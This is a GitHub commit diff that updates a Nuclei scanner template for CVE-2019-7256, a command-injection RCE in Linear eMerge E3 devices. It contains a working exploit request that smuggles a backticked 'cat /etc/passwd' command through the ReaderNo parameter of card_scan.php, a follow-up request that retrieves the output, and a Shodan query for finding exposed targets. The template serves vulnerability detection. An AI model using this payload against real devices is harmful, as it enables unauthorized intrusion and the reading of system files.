Merge pull request #7254 from projectdiscovery/CVE-2019-7256

Update CVE-2019-7256.yaml
patch-1
pussycat0x 2023-05-18 23:03:04 +05:30 committed by GitHub
commit 3ec8089ca4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 8 deletions

View File

@ -4,7 +4,8 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities. description: |
Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
reference: reference:
- https://www.exploit-db.com/exploits/47619 - https://www.exploit-db.com/exploits/47619
- http://linear-solutions.com/nsc_family/e3-series/ - http://linear-solutions.com/nsc_family/e3-series/
@ -16,28 +17,33 @@ info:
cve-id: CVE-2019-7256 cve-id: CVE-2019-7256
cwe-id: CWE-78 cwe-id: CWE-78
epss-score: 0.97447 epss-score: 0.97447
tags: cve,cve2019,emerge,rce,edb
metadata: metadata:
max-request: 2 max-request: 2
verified: "true"
shodan-query: title:"eMerge"
tags: cve,cve2019,emerge,rce,edb
variables:
file: "{{rand_text_alpha(10)}}"
http: http:
- raw: - raw:
- | - |
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1 GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- | - |
GET /nuclei.txt HTTP/1.1 GET /{{file}}.txt HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: regex - type: regex
regex: regex:
- "root:.*:0:0:" - "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03 # Enhanced by mp on 2022/05/03